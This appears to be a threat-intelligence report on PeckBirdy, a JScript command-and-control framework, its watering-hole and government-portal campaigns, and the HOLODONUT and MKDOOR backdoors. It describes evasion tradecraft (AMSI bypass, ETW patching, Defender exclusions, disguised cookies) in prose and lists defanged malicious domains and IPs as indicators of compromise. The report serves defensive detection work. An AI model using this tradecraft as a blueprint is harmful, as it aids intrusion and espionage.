PeckBirdy: Newly Discovered Script-Based C2 Framework Tied to Cyber Operations Targeting Gambling Firms and Asian Governments

CyberDefender 12 mins0

Since early 2023, multiple targeted intrusion campaigns have been observed leveraging a previously undocumented script-based command-and-control (C2) framework that we track internally as PeckBirdy. This framework has been actively used in operations targeting the Chinese online gambling sector, as well as government entities and private organizations across Asia.

PeckBirdy stands out due to its unusual design choices. While it provides advanced command-and-control, payload delivery, and lateral movement capabilities, it is implemented almost entirely in JScript, an outdated scripting language aligned with ECMAScript 3. This deliberate choice enables PeckBirdy to run across a wide range of execution contexts and abuse living-off-the-land binaries (LOLBins), significantly reducing its forensic footprint and increasing survivability in restricted environments.

Our investigation identified two major campaigns leveraging PeckBirdy:

  • SHADOW-VOID-044, primarily focused on watering-hole attacks against Chinese gambling platforms
  • SHADOW-EARTH-045, targeting Asian government systems and private organizations

In addition to the framework itself, we identified two modular backdoors, HOLODONUT and MKDOOR, that were deployed as follow-on payloads in these operations. Based on infrastructure overlap, tooling, and tradecraft, both campaigns are assessed to be linked to China-aligned advanced persistent threat (APT) actors, with varying confidence levels.

What PeckBirdy Is and Why It Matters

PeckBirdy is best described as a script-based post-exploitation and delivery framework rather than a single piece of malware. It acts as a flexible controller that can:

  • Serve malicious scripts during watering-hole attacks
  • Function as a reverse shell server
  • Act as a full C2 channel for backdoors during later stages of intrusion
  • Dynamically adapt its behavior depending on the execution environment

Unlike traditional malware that relies on compiled binaries, PeckBirdy is designed to operate entirely in memory and on demand, making detection and attribution significantly more difficult.

Affected Industries and Organizations

Primary Targets

  • Online gambling platforms operating in mainland China
  • Government agencies in Southeast Asia
  • Educational institutions
  • Private enterprises hosting IIS or web-facing infrastructure

Impacted Functions

  • Authentication portals and login pages
  • Public-facing websites used as watering holes
  • Internal enterprise networks during lateral movement
  • Endpoints targeted for long-term persistence

The attacks indicate a focus on credential harvesting, initial access at scale, and selective deployment of high-value backdoors.

In-The-Wild Activity Overview

Campaign SHADOW-VOID-044

Beginning in 2023, numerous Chinese gambling websites were found injected with malicious JavaScript code. These injected scripts redirected visitors to remote PeckBirdy servers, where the main framework script was dynamically delivered and executed in the victim’s browser.

Once executed, PeckBirdy displayed fraudulent software update pages, impersonating Google Chrome updates, to socially engineer victims into downloading malicious executables. These executables acted as loaders or backdoors, marking the transition from initial access to persistent compromise.

This campaign relied heavily on:

  • Compromised gambling websites
  • Script injection into legitimate content
  • User-driven execution through social engineering

Campaign SHADOW-EARTH-045

In mid-2024, a second campaign was identified targeting government entities and private organizations across Asia. Unlike SHADOW-VOID-044, this operation focused more on credential harvesting and internal movement rather than mass victimization.

Observed activity included:

  • Injection of PeckBirdy scripts into government login portals
  • Execution of PeckBirdy via MSHTA as a remote access channel
  • Use of custom .NET launchers embedding ScriptControl to execute JScript

This campaign demonstrates PeckBirdy’s versatility as both an initial access tool and a post-exploitation framework.

How PeckBirdy Works

Execution Environments

PeckBirdy is designed to run in multiple execution contexts, including:

  • Web browsers
  • MSHTA
  • WScript
  • Classic ASP
  • Node.js
  • .NET applications via ScriptControl

The framework detects its execution environment at runtime by checking for environment-specific objects such as:

  • window (browser)
  • process (Node.js)
  • response (ASP)
  • APPLICATION tag (HTA)

Each environment unlocks different capabilities, ranging from limited browser-only actions to full system interaction on Windows hosts.

Server APIs and Script Delivery

PeckBirdy servers expose simple HTTP(S) endpoints that return different landing scripts depending on the request path and ATTACK_ID. Each ATTACK_ID is a unique 32-character value that determines configuration and behavior.

Observed API patterns:

  • /[ATTACK_ID] – main framework script
  • /[ATTACK_ID]/hta – MSHTA launcher
  • /[ATTACK_ID]/html – browser-based payload
  • /[ATTACK_ID]/wscript – WScript execution

Each delivered script contains embedded configuration values, allowing the operator to fine-tune behavior per campaign or victim set.

Victim Identification and Tracking

PeckBirdy generates a unique victim identifier using different techniques depending on the environment:

  • On Windows hosts, it attempts to extract hardware identifiers from the motherboard and disk
  • If unavailable, it falls back to a randomly generated 32-character string

To maintain persistence:

  • In browsers, the ID is stored as a cookie prefixed with Hm_lvt_ to blend in with legitimate tracking cookies
  • On Windows systems, the ID is written to a temporary file named ___unique_id___

This allows PeckBirdy to recognize returning victims without traditional persistence mechanisms.

Command-and-Control Communication

PeckBirdy supports multiple communication channels:

  1. WebSocket (preferred)
  2. Flash-based TCP sockets (legacy fallback)
  3. Comet / LocalComet over HTTP(S)

Once communication is established, all traffic is:

  • Encrypted using AES
  • Encoded with Base64
  • Keyed using the ATTACK_ID value

Observed second-stage scripts include functionality for:

  • Cookie theft
  • Script execution
  • Payload delivery
  • Reverse shell creation

Associated Backdoors

HOLODONUT

HOLODONUT is a .NET-based modular backdoor deployed via a lightweight downloader tracked as NEXLOAD.

Execution Chain

  1. Initial connection sends a {string}#{string} marker
  2. Payload is retrieved and XOR-decrypted
  3. Execution is triggered via EnumWindows() callback
  4. Payload runs entirely in memory

Defense Evasion

  • AMSI bypass
  • ETW patching
  • In-memory execution using Donut-style techniques

Capabilities

  • Plugin-based architecture
  • Remote plugin load, execute, unload
  • Host reconnaissance
  • Controlled sleep and termination

MKDOOR

MKDOOR is a two-stage modular backdoor delivered through fake browser update installers.

Downloader Behavior

  • Adds itself to **Microsoft Defender exclusion list
  • Uses URLs masquerading as Microsoft support pages
  • Downloads the core backdoor module

Backdoor Behavior

  • Establishes C2 using Windows activation-themed URLs
  • Receives modular payloads from the server
  • Supports install, execute, sleep, and removal commands

This design allows operators to deploy only the capabilities needed for a specific target.

Attribution Assessment

SHADOW-VOID-044

This campaign shows strong links to China-aligned threat actors, based on:

  • Infrastructure overlap with known gambling-focused operations
  • Hosting of GRAYRABBIT variants
  • Shared C2 domains and signing certificates
  • Tactical overlap with previously observed campaigns

Confidence level: Moderate to High

SHADOW-EARTH-045

This campaign demonstrates tradecraft consistent with Chinese state-aligned intrusion sets but lacks definitive overlaps.

Indicators include:

  • Government-focused targeting
  • MSHTA-based execution
  • Infrastructure previously linked to Asia-focused espionage

Confidence level: Low to Moderate

Indicators of Compromise (IOCs)

Domains

  • center.myrnicrosoft[.]com
  • mkdmcdn[.]com
  • oss-cdn[.]com
  • github.githubassets[.]net

IP Addresses

  • 47.238.219[.]111
  • 47.238.184[.]9

URLs

  • /en-us/howtotell/default.aspx
  • /en-us/windows/activate-windows-c39005d4-95ee-b91e-b399-2820fda32227

File Artifacts

  • ___unique_id___
  • Fake Chrome update executables
  • MKDOOR downloader binaries

Behavioral Indicators

  • MSHTA executing remote JavaScript
  • Browser cookies prefixed with Hm_lvt_ containing random IDs
  • Defender exclusions added programmatically
  • Local high-port HTTP listeners for infection validation

Conclusion

PeckBirdy represents a highly adaptable and stealth-focused framework designed to operate across diverse environments while minimizing forensic visibility. Its reliance on script-based execution, dynamic payload delivery, and LOLBin abuse reflects a broader trend among China-aligned threat actors toward low-noise, high-flexibility intrusion tooling.

The combination of PeckBirdy with modular backdoors such as HOLODONUT and MKDOOR enables operators to tailor attacks precisely to victim environments, making detection and remediation increasingly challenging.

Organizations operating public-facing web infrastructure, especially in high-risk regions or industries, should treat script-level anomalies and LOLBin abuse as high-priority indicators of compromise, as these techniques are no longer edge cases but core components of modern intrusion campaigns.

CyberDefender